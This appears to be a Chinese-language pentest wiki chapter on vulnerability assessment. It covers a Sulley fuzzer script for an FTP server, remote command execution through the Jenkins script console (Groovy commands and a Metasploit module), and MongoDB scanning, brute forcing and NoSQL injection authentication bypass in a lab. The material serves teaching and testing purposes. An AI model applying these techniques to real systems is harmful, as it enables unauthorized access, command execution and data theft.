Pentest Wiki Part2 漏洞评估

漏洞评估

确定了最可行的攻击方法之后，您需要考虑如何访问目标。在脆弱性分析过程中，您可以结合前一阶段学到的信息，并用它来了解哪些攻击是可行的。其中，漏洞分析考虑了端口和漏洞扫描，通过抓取banner收集的数据以及收集情报期间收集的信息。

评估分类：

• 网络评估
• Web应用程序评估
• 数据库评估

网络评估

Fuzzers-sulley

代码(fuzz_PCManftpd32.py)

#coding=utf-8
# 视频1使用Sulley框架的实现fuzz
# http://www.dfate.de/public/index.php/post/exploit-development-series-video-1-practical-fuzzing-basics-using-the-sulley-framework
# https://www.exploit-db.com/exploits/37731/

# -------------------------------------------------------------------
# Usage:
# C:\Fuzzing\sulley>python network_monitor.py -d 0 -f "port 21" -P audit
# C:\Fuzzing\sulley>python process_monitor.py -c audit\pcmanftpd_crashbin -p "PCManFTPD2.exe"

# -------------------------------------------------------------------
# 分析:

"""
220 PCMan's FTP Server 2.0 Ready.
USER anonymous
331 User name okay, need password.
PASS password12345
230 User logged in
PORT 192,168,1,106,206,27
200 Command okay.
STOR demo2.txt
150 File status okay; Open data connection.
226 Data Sent okay.
PORT 192,168,1,106,206,28
200 Command okay.
LIST
150 File status okay; Open data connection.
226 Data Sent okay.
PORT 192,168,1,106,206,29
200 Command okay.
RETR demo2.txt
150 File status okay; Open data connection.
226 Data Sent okay.
QUIT
"""

from sulley import *

# 总体概述
#1.创建请求（定义模糊语法）
#2.定义会话
#3.定义目标
#4.fuzz！

# s_initialize - 构建一个新的请求
# s_static ("USER") - 一个静态（未改变）的字符串，不会被fuzz
# s_delin(" ") - 可以fuzz的分隔符，将有不同的使用s_string的变动
# s_string("anonymous") - 一个将被变动的字符串。 包含比s_delim更多的变动

# -------------------------------------------------------------------
# 语法测试
s_initialize("user")
s_static("USER")
s_delim(" ", fuzzable=False)
s_string("anonymous")
s_static("\r\n")

s_initialize("pass")
s_static("PASS")
s_delim(" ", fuzzable=False)
s_string("pass12345")
s_static("\r\n")

s_initialize("put")
s_static("PUT")
s_delim(" ", fuzzable=False)
s_string("fuzz_strings")
s_static("\r\n")

s_initialize("stor")
s_static("STOR")
s_delim(" ", fuzzable=True)
s_string("AAAA")
s_static("\r\n")

s_initialize("mkd")
s_static("MKD")
s_delim(" ", fuzzable=False)
s_string("AAAA")
s_static("\r\n")

# -------------------------------------------------------------------
# 定义pre_send函数。 三次握手后会立即执行
def receive_ftp_banner(sock):
    data = sock.recv(1024)
    print(data)

# -------------------------------------------------------------------
# 定义会话
# 会话参数
SESSION_FILENAME = "pcmanftpd-session"  # 跟踪当前的fuzz状态
SLEEP_TIME = 0.5                        # 在两次fuzz尝试之间暂停
TIMEOUT = 5                             # 没有连接5秒后，fuzz会超时
CRASH_THRESHOLD = 4                     # 4次崩溃后，参数将被跳过

mysession = sessions.session(
    session_filename=SESSION_FILENAME,
    sleep_time=SLEEP_TIME,
    timeout=TIMEOUT,
    crash_threshold=CRASH_THRESHOLD)

mysession.pre_send = receive_ftp_banner
mysession.connect(s_get("user"))
mysession.connect(s_get("user"), s_get("pass"))
mysession.connect(s_get("pass"), s_get("stor"))
mysession.connect(s_get("pass"), s_get("mkd"))
mysession.connect(s_get("pass"), s_get("put"))

# -------------------------------------------------------------------
# 绘制代表fuzz路径的图形。
with open("session_test.udg", "w+") as f:
    f.write(mysession.render_graph_udraw())

# -------------------------------------------------------------------
# 一些概述输出

print("Number of mutation during one case: %s\n" % str(s_num_mutations()))
print("Total number of mutations: %s\n" % str(s_num_mutations() * 5))

decision = raw_input("Do you want to continue?(y/n): ")
if decision == "n":
    exit()

# -------------------------------------------------------------------
# 定义目标具体参数
host = "192.168.1.107"
ftp_port = 21
netmon_port = 26001
procmon_port = 26002
target = sessions.target(host, ftp_port)
target.procmon = pedrpc.client(host, procmon_port)
target.netmon = pedrpc.client(host, netmon_port)

target.procmon_options = {
    "proc_name": "pcmanftpd2.exe",
    "stop_commands": ["wmic process where (name='PCManFTPD2.exe') call terminate"],
    "start_commands": ["C:\\PCManFTP\\PCManFTPD2.exe"]
}

# 将目标添加到会话
mysession.add_target(target)

# -------------------------------------------------------------------
# 让我们开始搞事情

print("Starting fuzzing now")
mysession.fuzz()

# 开启fuzz进程
# 也可以通过网页界面（http://127.0.0.1:26000）查看当前状态

代码分析

该代码通过sulley框架来进行fuzz测试，首先进行语法测试，构造多个新请求(包括FTP的user、pass、put、stor、mkd)，设置静态字符串和FUZZ字符串，然后定义pre_send三次握手后立即执行，定义会话及会话参数，绘制udg格式的fuzz路径图形，输入一些概述后定义目标具体参数，将目标添加到会话中，直接开始搞事情。

期间可以通过网页界面(http://127.0.0.1:26000)查看当前状态

Jenkins Hacking

1. 如何部署jenkins？
2. 如何利用jenkins服务器？

Jenkins是一个独立、开源的自动化服务器，可用于自动执行各种任务，如构建，测试和部署软件。Jenkins可以通过本地系统软件包Docker安装，甚至是独立运行在安装java运行环境的任何机器上。

如何部署jenkins？

这引导将使用“独立的”Jenkins发行版，该发行版要求最少使用Java 7，但建议使用Java 8。还建议使用超过512MB RAM的系统。

1. 下载Jenkins.
2. 在下载目录中打开终端并运行java -jar jenkins.war
3. 在浏览器中打开http：// localhost：8080并按照说明完成安装。
4. 许多Pipeline示例需要在与Jenkins相同的计算机上安装Docker。

请检查安装日志，如下：

root@lab:~/Downloads# java -jar jenkins.war
Running from: /root/Downloads/jenkins.war
webroot: $user.home/.jenkins
Mar 15, 2017 5:03:49 AM Main deleteWinstoneTempContents
WARNING: Failed to delete the temporary Winstone file /tmp/winstone/jenkins.war
Mar 15, 2017 5:03:50 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Logging initialized @6168ms
Mar 15, 2017 5:03:50 AM winstone.Logger logInternal
INFO: Beginning extraction from war file
Mar 15, 2017 5:04:05 AM org.eclipse.jetty.util.log.JavaUtilLog warn
WARNING: Empty contextPath
Mar 15, 2017 5:04:06 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: jetty-9.2.z-SNAPSHOT
Mar 15, 2017 5:04:10 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: NO JSP Support for /, did not find org.eclipse.jetty.jsp.JettyJspServlet
Jenkins home directory: /root/.jenkins found at: $user.home/.jenkins
Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Started w.@30990c1b{/,file:/root/.jenkins/war/,AVAILABLE}{/root/.jenkins/war}
Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Started ServerConnector@54227100{HTTP/1.1}{0.0.0.0:8080}
Mar 15, 2017 5:04:20 AM org.eclipse.jetty.util.log.JavaUtilLog info
INFO: Started @36602ms
Mar 15, 2017 5:04:20 AM winstone.Logger logInternal
INFO: Winstone Servlet Engine v2.0 running: controlPort=disabled
Mar 15, 2017 5:04:22 AM jenkins.InitReactorRunner$1 onAttained
INFO: Started initialization
Mar 15, 2017 5:04:23 AM jenkins.InitReactorRunner$1 onAttained
INFO: Listed all plugins
Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained
INFO: Prepared all plugins
Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained
INFO: Started all plugins
Mar 15, 2017 5:04:45 AM jenkins.InitReactorRunner$1 onAttained
INFO: Augmented all extensions
Mar 15, 2017 5:04:51 AM jenkins.InitReactorRunner$1 onAttained
INFO: Loaded all jobs
Mar 15, 2017 5:04:51 AM hudson.model.AsyncPeriodicWork$1 run
INFO: Started Download metadata
Mar 15, 2017 5:04:52 AM org.jenkinsci.main.modules.sshd.SSHD start
INFO: Started SSHD at port 43731
Mar 15, 2017 5:04:53 AM jenkins.InitReactorRunner$1 onAttained
INFO: Completed initialization
Mar 15, 2017 5:04:55 AM org.springframework.context.support.AbstractApplicationContext prepareRefresh
INFO: Refreshing org.springframework.web.context.support.StaticWebApplicationContext@4d8c4701: display name [Root WebApplicationContext]; startup date [Wed Mar 15 05:04:55 EDT 2017]; root of context hierarchy
Mar 15, 2017 5:04:55 AM org.springframework.context.support.AbstractApplicationContext obtainFreshBeanFactory
INFO: Bean factory for application context [org.springframework.web.context.support.StaticWebApplicationContext@4d8c4701]: org.springframework.beans.factory.support.DefaultListableBeanFactory@16f7f485
Mar 15, 2017 5:04:55 AM org.springframework.beans.factory.support.DefaultListableBeanFactory preInstantiateSingletons
INFO: Pre-instantiating singletons in org.springframework.beans.factory.support.DefaultListableBeanFactory@16f7f485: defining beans [authenticationManager]; root of factory hierarchy
Mar 15, 2017 5:04:58 AM org.springframework.context.support.AbstractApplicationContext prepareRefresh
INFO: Refreshing org.springframework.web.context.support.StaticWebApplicationContext@1aa6a1d4: display name [Root WebApplicationContext]; startup date [Wed Mar 15 05:04:58 EDT 2017]; root of context hierarchy
Mar 15, 2017 5:04:58 AM org.springframework.context.support.AbstractApplicationContext obtainFreshBeanFactory
INFO: Bean factory for application context [org.springframework.web.context.support.StaticWebApplicationContext@1aa6a1d4]: org.springframework.beans.factory.support.DefaultListableBeanFactory@26dbd965
Mar 15, 2017 5:04:58 AM org.springframework.beans.factory.support.DefaultListableBeanFactory preInstantiateSingletons
INFO: Pre-instantiating singletons in org.springframework.beans.factory.support.DefaultListableBeanFactory@26dbd965: defining beans [filter,legacy]; root of factory hierarchy
Mar 15, 2017 5:04:59 AM jenkins.install.SetupWizard init
INFO:

*************************************************************
*************************************************************
*************************************************************

Jenkins initial setup is required. An admin user has been created and a password generated.
Please use the following password to proceed to installation:

e019dca34bac4a30beca67b53e821f35

This may also be found at: /root/.jenkins/secrets/initialAdminPassword

*************************************************************
*************************************************************
*************************************************************

Mar 15, 2017 5:05:06 AM hudson.model.UpdateSite updateData
INFO: Obtained the latest update center data file for UpdateSource default
Mar 15, 2017 5:05:09 AM hudson.model.DownloadService$Downloadable load
INFO: Obtained the updated data file for hudson.tasks.Maven.MavenInstaller
Mar 15, 2017 5:05:09 AM hudson.model.UpdateSite updateData
INFO: Obtained the latest update center data file for UpdateSource default
Mar 15, 2017 5:05:10 AM hudson.WebAppMain$3 run
INFO: Jenkins is fully up and running
Mar 15, 2017 5:05:10 AM javax.jmdns.impl.HostInfo newHostInfo
WARNING: Could not intialize the host network interface on nullbecause of an error: lab: lab: Temporary failure in name resolution
java.net.UnknownHostException: lab: lab: Temporary failure in name resolution
    at java.net.InetAddress.getLocalHost(InetAddress.java:1505)
    at javax.jmdns.impl.HostInfo.newHostInfo(HostInfo.java:75)
    at javax.jmdns.impl.JmDNSImpl.(JmDNSImpl.java:407)
    at javax.jmdns.JmDNS.create(JmDNS.java:60)
    at hudson.DNSMultiCast$1.call(DNSMultiCast.java:33)
    at jenkins.util.ContextResettingExecutorService$2.call(ContextResettingExecutorService.java:46)
    at java.util.concurrent.FutureTask.run(FutureTask.java:266)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
    at java.lang.Thread.run(Thread.java:745)
Caused by: java.net.UnknownHostException: lab: Temporary failure in name resolution
    at java.net.Inet6AddressImpl.lookupAllHostAddr(Native Method)
    at java.net.InetAddress$2.lookupAllHostAddr(InetAddress.java:928)
    at java.net.InetAddress.getAddressesFromNameService(InetAddress.java:1323)
    at java.net.InetAddress.getLocalHost(InetAddress.java:1500)
    ... 9 more

Mar 15, 2017 5:05:18 AM hudson.model.DownloadService$Downloadable load
INFO: Obtained the updated data file for hudson.tools.JDKInstaller
Mar 15, 2017 5:05:18 AM hudson.model.AsyncPeriodicWork$1 run
INFO: Finished Download metadata. 27,508 ms

请注意这里，我们需要密码来完成设置。

Jenkins initial setup is required. An admin user has been created and a password generated.
Please use the following password to proceed to installation:

e019dca34bac4a30beca67b53e821f35

如何利用jenkins服务器？

访问 http://127.0.0.1:8080/script, 并用脚本控制台pwn jenkins服务器。

脚本控制台

输入一个任意的Groovy脚本并在服务器上执行它。用于故障排除和诊断。使用'println'命令来查看输出结果(如果使用System.out，它将转到服务器的stdout，这是很难看到的。)

例如：

execmd.groovy

execmd.groovy 可以帮助你在jenkins服务器上执行os命令。

# Windows

println "cmd.exe /c dir".execute().text


# Linux

println "uname -a".execute().text

writefile.groovy

writefile.groovy 可以将字符串写入jenkins服务器上的文件。

new File("/tmp/test.sh").write("""
echo "123"
echo "456"
""")

如果你更喜欢metasploit-framework,

msf > use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   password         no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.100    yes       The target address
   RPORT      8080             yes       The target port
   TARGETURI  /                yes       The path to jenkins
   USERNAME   test             no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   1   Linux
msf exploit(jenkins_script_console) > exploit

链接

• https://jenkins.io/

WEB应用程序评估

Android hacking 与 安全

1. 利用保护应用程序组件
2. 内容提供者泄露
3. 利用广播接收机
4. 利用非预期的数据泄漏端信道数据泄漏
5. 使用jdb调试java应用程序
6. 利用可调试的android应用程序
7. 攻击android的webviews
8. 根检测规避
9. 不安全的本地存储共享偏好
10. 不安全的本地存储
11. 黑盒评估introspy
12. 保护共享偏好第三方库
13. drozer介绍
14. 检查Android应用程序特定的数据非根设备
15. 使用备份技术攻击android应用程序
16. 破解密码学
17. 破解Android应用程序二进制文件
18. 逆向工程介绍
19. 使用nosql数据库不安全的数据存储
20. 使用gdb在android模拟器上调试应用程序

安卓逆向工程

1. http://www.fasteque.com/android-reverse-engineering-101-part-1/
2. http://www.fasteque.com/android-reverse-engineering-101-part-2/
3. http://www.fasteque.com/android-reverse-engineering-101-part-3/
4. http://www.fasteque.com/android-reverse-engineering-101-part-4/
5. http://www.fasteque.com/android-reverse-engineering-101-part-5/

Android安全和渗透利用

1. 介绍
2. Android的安全性-介绍
3. Android-架构
4. Android-权限
5. Android-应用
6. Genymotion(一款安卓模拟器) 设置
7. Android-应用程序组件
8. Dex-分析
9. Android-调试桥
10. 基于日志记录的漏洞
11. 应用逆向
12. 分析Android的软件及恶意软件
13. 流量分析
14. SSL-Pinning
15. 泄漏的内容提供商
16. Drozer-功夫
17. 基于read的内容提供商漏洞
18. 进阶Drozer-功夫
19. Drozer脚本
20. Dropbox的脆弱性
21. 基于备份的漏洞
22. 客户端注入
23. Hooking 介绍和不安全的设置
24. 基于Andbug的Android调试
25. JDB调试
26. 用Introspy自动Hooking
27. Cydia-基底
28. 使用Xposed进行Hooking
29. Androguard脚本和分析
30. 基于webviews的漏洞
31. 利用Metasploit工具攻击webviews

书籍推荐

1. Android安全手册
2. Android黑客手册
3. 学习针对Android设备的测试

数据库评估

mongodb

1. 介绍和Labs安装.

1.1 什么是MongoDB ?

MongoDB是一种开源的、文档导向的数据库管理系统，由C++撰写而成。
在MongoDB中，数据以JSON样式文档的形式存储。
MongoDB的一些主要特性:
• 基于文档
• 高性能
• 高可用性
• 简单的可扩展性
• 没有复杂的联接

1.2 安全性如何 ?

随着NoSQL数据库的使用越来越多，安全性应该被认真考虑。 就像其他系统一样，MongoDB的安全性也不是一个单一的工作。 生态系统中的每个人都对此负责。 尽管MongoDB具有一些内置的安全功能，但由于各种原因（如配置错误，不更新，编程不佳等），在生产中可能存在漏洞 。

1.3 在ubuntu中安装MongoDB

我这里使用的是Ubuntu14.04，不同的版本安装MongoDB的命令可能有点差异，为了方便，Ubuntu开启了SSH服务，安装了特定版本的MongoDB 3.0.4。
step 1 : 导入MongoDB GPG密钥。
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv 7F0CEB10
step 2 : 为mongodb创建一个list file
echo "deb http://repo.mongodb.org/apt/ubuntu precise/mongodb-org/3.0 multiverse" | sudo tee /etc/apt/sources.list.d/mongodb-org-3.0.list
step 3 : 只更新mongodb-org-3.0.list
sudo apt-get update
step 4 : 安装特定版本的mongodb
sudo apt-get install -y mongodb-org=3.0.4 mongodb-org-server=3.0.4 mongodb-org-shell=3.0.4 mongodb-org-mongos=3.0.4 mongodb-org-tools=3.0.4
step 5 : 配置防止意外升级
echo "mongodb-org hold" | sudo dpkg --set-selections
echo "mongodb-org-server hold" | sudo dpkg --set-selections
echo "mongodb-org-shell hold" | sudo dpkg --set-selections
echo "mongodb-org-mongos hold" | sudo dpkg --set-selections
echo "mongodb-org-tools hold" | sudo dpkg --set-selections
step 6 : 启动MongoDB服务
sudo service mongod start
step 7 : 验证进程是否成功启动
tail -20 /var/log/mongodb/mongod.log
如果看到如下输出信息,意味着进程已成功启动
[initandlisten] waiting for connections on port
step 8 : 为了实现渗透测试，需要使用以下步骤启动MongoDB
sudo mongod --httpinterface --rest --smallfiles

1.4 学习Mongo Shell

在前几节中，我们已经看到了对MongoDB及其设置的简要介绍。现在是时候使用Mongo shell并在MongoDB上执行一些命令来更好了解MongoDB及其工作。
MongoDB使用JavaScript风格的查询，因此我们觉得大部分时间都在运行JavaScript代码。
本节将简要介绍MongoDB的工作原理,并且介绍简单的Mongo shell命令。
在我们开始之前，有几个术语要理解。
• MongoDB 可以有多个数据库.
• 每个数据库都含有一个或多个集合 “collections”.
• 每个集合都含有一个或多个文档 “documents”.

现在，我们继续运行MongoDB命令。

1.4.1 创建数据库

如果要创建的数据库名不存在，以下命令将创建一个新的数据库，数据库名已存在会直接使用它。

让我们来创建一个名为"testdb"的数据库。

1.4.2 检查当前数据库

我们可以使用命令"db"来检查当前的数据库。 我们运行命令"db"来检查当前的数据库。

1.4.3 检查数据库列表

"show dbs"是列出可用数据库的命令,但是这里并没有输出我们刚才创建的testdb数据库，因为它至少需要一个文档，当我们插入一个文档，我们就可以看到列出的数据库。

1.4.4 将数据插入集合

这个是把一个数据插入到data集合中。
"db.data.insert({"user":"test1"})

1.4.5 查询数据

从MongoDB集合中查询数据，可以使用find()方法。
让我们查询data集合中的全部文档数据。
"db.data.find()"

1.4.6 在查询数据时写入条件

我们还可以使用MongoDB特定的语法在类似于RDBMS条件的查询中编写条件，让我们来匹配用户名user为test1的数据。

1.4.7 删除数据

我们可以使用remove()方法根据特定条件从集合中删除文档。让我们来删除用户名user为test3的数据。

1.4.8 删除集合

我们可以使用drop()方法来删除集合，让我们来删除data集合。

1.4.9 删除数据库

我们可以使用db.dropDatabase()删除目前使用的数据库。

1.5 Lab实验环境安装

熟悉了MongoDB的基本操作之后，接下来我们本地搭建一个Lab实验环境来开始我们的MongoDB数据库渗透测试。

这里我是通过Parrot和Ubuntu虚拟机来搭建Lab实验环境的,只要确保两主机网络互通即可，桥接和NAT都可以实现。
用Ubuntu来模拟现实中的生产机器，安装MongoDB和php web应用程序。
接下来正式开始我们的Lab实验环境搭建，我这里先安装好了LAMP。

注意: 请使用与我用来创建数据库和集合相同的名称。这是PHP Web应用程序的工作所必需的。如果您更改这些名称，则可能需要相应地更改PHPWeb应用程序。

step 1 : 创建一个新的数据库

step 2 : 插入数据

把测试数据插入集合"users"和集合"products"。

db.users.insert({"username":"tom","password":"tom","email":"[email protected]","cardnumber":12345})
db.users.insert({"username":"jim","password":"jim","email":"[email protected]","cardnumber":54321})
db.users.insert({"username":"bob","password":"bob","email":"[email protected]","cardnumber":22222})
db.products.insert({"email":"[email protected]","prodname":"laptop","price":"1500USD"})
db.products.insert({"email":"[email protected]","prodname":"book","price":"50USD"})
db.products.insert({"email":"[email protected]","prodname":"diamond-ring","price":"4500USD"})

step 3 : 安装mongo的PHP驱动程序

为了使PHP Web应用程序能够使用MongoDB，我们需要安装PHP驱动程序。

sudo apt-get install php-pear
sudo pecl install mongo

如果出现如下报错，使用sudo apt-get install php5-dev，安装完成后。
再使用sudo pecl install mongo即可。

安装完成后，会提示把"extension=mongo.so"添加到php.ini中，添加即可。

step 4 : 安装PHP Web应用程序

这里安装比较简单了，直接把mongo.zip拷贝到Ubuntu,解压到/var/www/html目录下，启动apache服务即可。

这一步完成了PHP漏洞应用程序的安装。一旦一切正常，我们可以在浏览器中启动Web应用程序。如图所示:

之前我们已经在Mongo数据库中插入了测试数据，现在我们直接用tom用户密码登录。

如果你看到如上所示的主页，那就证明MongoDB渗透环境已经搭建好了。

2. 漏洞评估

2.1 介绍

面对错误配置问题,MongoDB可能会像其他数据库/服务器一样。在本节中，我们将看到一些常见的错误配置以及如何识别它们。我们也将看到与使用MongoDB作为后端的Web应用程序相关的漏洞。

2.2 扫描开放端口

在进行黑盒评估时，我们可以使用nmap来确定MongoDB是否在远程主机上运行。 MongoDB服务的默认端口是27017。扫描到27017是open表示允许在远程主机上运行，默认绑定地址是127.0.0.1，是扫不出来的，我这里修改了绑定地址为0.0.0.0

MongoDB默认设置不需要使用客户端控制台进行连接的任何验证。如果MongoDB服务在没有适当的安全控制的情况下通过网络公开，任何人都可以远程连接到数据库，并执行命令来创建/读取/更新/删除数据库。我们将在后面的章节中试图做到这一点。

2.3 服务枚举

虽然我们知道了开放端口2017，但其他一些服务可能会使用此端口。也可以运行MongoDB在不同的端口上。 为了确保我们找到的端口是MongoDB，我们可以使用nmap的“-sV”标志来执行服务枚举。

这也有助于弄清楚MongoDB的版本，以便我们可以找到任何已知的版本可用漏洞。

在我们的渗透测试中，我们可能会遇到MongoDB的老版本。一个快速的Shodan搜索显示，大部分被发现的MongoDB版本都在运行旧版本的MongoDB。

这对攻击者来说绝对是个好消息，因为旧版本的MongoDB实例中存在许多默认的错误配置。

2.4 扫描HTTP接口

MongoDB提供了一个简单的HTTP界面，列出管理员感兴趣的信息。如果使用带--rest选项的接口启用mongod，则可以通过比配置的mongod端口多1000个端口来访问它。 HTTP接口的默认端口是28017。我们在搭建实验环境时已经使用了带--rest选项的命令来启动mongod。
我们可以使用nmap查看远程主机是否使用http接口运行，通过-sV确认它是MongoDB的http界面。

注 意 : 默认情况下运行的MongoDB版本大于2.6，禁用http接口。

2.5 访问HTTP接口

可直接通过HTTP链接访问：http://192.168.2.105:28017/，可实现多种功能，大家自行研究。

2.6 用nmap NSE scripts进行扫描

如果http接口需要认证，我们需要尝试暴力破解。有相当多的nmap nse 脚本可用于MongoDB漏洞评估。我们可以使用它们来识别目标机器中的漏洞。

2.7 mongodb-brute

使用这个NSE脚本对MongoDB数据库执行暴力破解密码审计，我们可以看到mongodb-brute已经进行了测试并确认不需要认证。

2.8 mongodb-databases

使用这个NSE脚本尝试从MongoDB数据库获取表的列表。这只有在MongoDB接口不需要验证的情况下才有效。

2.9 Metasploit辅助模块

使用auxiliary/scanner/mongodb/mongodb_login辅助模块
show options 查询需要配置的选项。

设置好参数，直接run，这里看到是没认证的，如果有认证需要配合字典爆破。

从MongoDB版本3.0开始，MongoDB已经将其默认的认证方法改变为质询和响应机制（SCRAM-SHA-1）。根据文档，“SCRAM-SHA-1根据用户的名称，密码和数据库验证提供的用户凭证。
当用户使用MongoDB进行身份验证时，他必须提供用户名，密码和创建数据库。

mongo 192.168.2.105 -u user -p password --authenticationDatabase userdb

在MongoDB上暴力破解是有点困难，因为我们需要能够正确地通过所有这三个。 知道创建用户的数据库的名称很重要。 通常情况下，自动化工具默认选择“admin”作为数据库。

2.10 攻击利用

在最初的信息收集阶段，我们了解到远程主机正在运行MongoDB，并且不需要进行身份验证即可连接到服务器。
当在生产环境中使用MongoDB时，必须从其他数据库和/或应用程序服务器访问。当mongod通过网络暴露给其他主机时，必须小心防止不必要的暴露出公网。
当我们可以免认证直接连接到MongoDB数据库或者WEB访问28017端口，就可以随意进行自己想要的操作。

3. 攻击应用程序

3.1 介绍

到目前为止，在给出MongoDB主机的IP地址时，我们学会了评估Mongo主机安全性的技术。 本节将介绍在MongoDB与Web应用程序一起使用时执行NoSQL注入攻击的技术。
SQL数据库（如MySQL）上的注入是非常常见的。 有一个误解，即MongoDB不使用SQL，因此在使用MongoDB的应用程序中不能使用注入。但当用户输入没有正确过滤时，仍然可以对基于MongoDB的应用程序进行注入攻击。

我们将用使用MongoDB作为后端的PHP应用程序来演示这种攻击。

以PHP和MongoDB为后端的NoSQL注入

让我们开始使用之前搭建好的实验环境-PHP-MongoDB应用程序，先了解应用程序功能，我们打开首页，需要输入正确的用户名和密码登录。 如果用户名/密码不正
确，应用程序将会报错。

接下来让我们通过使用注入绕过这个认证。

认证绕过
确保浏览器配置为通过Burp代理发送所有流量，因为应用程序使用POST方法发送凭证，我们直接把请求包截取下来。

从上图可以看出，我们通过"tom"作为用户名和密码。我们可以对数据进行修改再转发到服务器。 在修改这些参数之前，我们先理解MongoDB注入是如何工作的。
了解MongoDB中的注入:
在后台运行的查询将创建以下语句

这看起来没问题，因为它正在提取我们请求的文件，这个文件的用
户名和密码是"tom"
但是，如果上面的命令被修改会怎样？ 如下所示 ：

如果你注意到，上面的MongoDB命令是获取用户名是“tom”而密码不等于“test0x00”的所有文档。
我们直接修改命令，同时对用户名和密码注入。

这一次，我们可以看到所有不符合条件用户名和密码的文件。

那么就这些条件的功能而言，这个输出就像预期的一样。

试想一下，如果可以从Web应用程序入口点创建这种情况，即使密码不匹配，我们也能够看到特定用户名的文档。 显然，这会对应用程序造成严重的危险。

测试注入：
在我们继续向数据库中注入一些恶意查询之前，我们来测试一下MongoDB及其异常的存在。 这个想法和其他注入一样。

正如我们在前面的章节中看到的，在MongoDB查询中可以传递[$ne]这样的条件。 如果我们传递一些MongoDB未知的东西，会发生什么？

我们可以往MongoDB查询中传递一个[$nt].

正如我们在上面的输出中可以看到的，我们打破了查询，并得到一个错误，说“未知的操作符：[$nt]”

让我们从实验环境PHP应用程序中尝试这个。 如果异常处理不当并抛出给用户，与MySQL数据库中的SQL注入类似，我们可以看到MongoDB的存在并收集其他关键信息。

让我们注入一些未知的运算符，重发刚才拦截到的数据包，看看MongoDB是否执行它。

在浏览器看不出问题所在，没有任何错误回显。但burp就可以看到出现500内部错误。

当我们把不存在的数组修改器[$nt]改成[$ne],重发数据包后就发现登录成功了。

我这里直接用hackbar进行post数据，可以看到我们已经成功登录进后台了。
下面贴上index.php的漏洞代码片段：

我们来分析一下MongoDB层面发生了什么

我们传递的数据已经发送到数据库，下面的查询已经被执行，允许我们登录。

我们还可以检查MongoDB控制台日志，以了解攻击者执行的操作。

这不仅仅是绕过认证，而且我们也可以使用相同的技术在某些情况下从数据库中提取数据，如下所示。

实验环境WEB应用程序有一个功能，我们可以在其中搜索用户所做的购买细节 。首先，用户必须登录到应用程序，然后他可以输入他的电子邮件ID来查看他的购买细节。

注 意 : 虽然在这个应用程序中没有实现 输入控制 ，但假设这个应用程序在输入电子邮件ID时不会显示其他用户的详细信息。

枚举数据:

当用户输入他的邮箱地址进行搜索详细信息，URL会变成如下：
http://192.168.2.105/[email protected]&Search=Search
上面的查询显示了与输入的电子邮件ID相关的输出，如下所示。

让我们再次测试MongoDB注入 ，如下所示

MongoDB可能会执行我们传递的查询，因为它正在执行我们在URL中传递的操作符并中断查询。我们把[$nk]替换成[$ne]再次进行注入。

如上所示，我们看到正确查询到了3条数据，但是默认只显示一条。我们可以通过[$ne]来遍历数据。

这个例子显示了对基于MongoDB的应用程序的严重注入攻击的可能性。

下面贴上home.php的漏洞代码片段

如何解决这个问题？

这个问题背后的根本原因是缺乏对来自用户的数据类型进行适当的输入验证。 确保用户输入在处理之前被严格验证。

我们只需要做下严格验证即可，例如：
(string)$_POST['uname']
(string)$_POST['upass']
确保变量在被传递到MongoDB驱动程序之前被正确输入。

以 NodeJS和MongoDB 为后端的 NoSQL注入，跟PHP应用程序注入方式一样，感兴趣的可以自行研究。

4. 自动化评估

在之前的所有章节中，我们都使用了一些使用nmap等半自动化工具的手动技术来识别目标中的漏洞。在本节中，我们使用自动化方法来查找前面部分提到的所有漏洞。
我们将使用一个非常好的工具，称为NoSQLMap。

介绍
NoSQLMap是一个开源的Python工具，用于审计和自动化注入攻击，并利用NoSQL数据库中的缺省配置弱点，以及使用NoSQL的Web应用程序来泄露数据库中的数据。目前，这个工具的漏洞主要集中在MongoDB上，但是在未来的版本中计划对其他基于NoSQL的平台（如CouchDB，Redis和Cassandra）提供额外的支持。

特性
• 自动化的MongoDB和CouchDB数据库枚举和克隆攻击。
• 通过MongoDB Web应用程序提取数据库名称，用户和密码哈希。
• 使用默认访问和枚举版本扫描MongoDB和CouchDB数据库的子网或IP列表。
• 使用 强力字典 爆破 MongoDB和CouchDB 的 哈希。
• 针对MongoClient的PHP应用程序参数注入攻击返回所有数据库记录。
• Javascript函数变量转义和任意代码注入来返回所有的数据库记录。
• 基于计时的攻击类似于SQL盲注来验证没有回显信息的Javascript注入漏洞。

下载并安装好NoSQLMap，运行：

4.1 准备好NoSQLMap

根据我们的目标，我们可以选择一个合适的选项。 在进行漏洞评估之前，我们需要使用选项1来设置参数。

 第一个选项是指定目标IP地址。
• 第二个选项是指定被渗透机WEB应用的地址。
• 第三个选项是指定可能存在注入的路径。
• 第四个选项是切换HTTPS。
• 第五个选项是指定MongoDB的工作端口。
• 第六个选项是设置HTTP请求模式。
• 第七个选项是设置本地的IP地址。
• 第八个选项是设置本地监听端口(MongoDB shell的反弹端口)。
• ......

下面让我们开始实验。我们先需要设置好相关参数。

4.2 NoSQL DB访问攻击

退出主界面选择第二个NoSQL DB Access Attacks。此选项将检查目标服务器上的MongoDB是否可通过网络访问。 如果可以访问，它将检查我们在前面章节中讨论的错误配置(没有认证，暴露的WEB控制台，暴露的REST端口)

从上面的输出我们可以看到，NoSQLMap发现通过网络访问MongoDB没有认证，然后给我们提供了获取服务器系统和版本，数据库枚举，检查规范，克隆数据库等功能。
我们先获取服务器系统和版本，如图：

数据库枚举，从远程服务器 dump 所有数据库和集合：

4.3 匿名MongoDB访问扫描

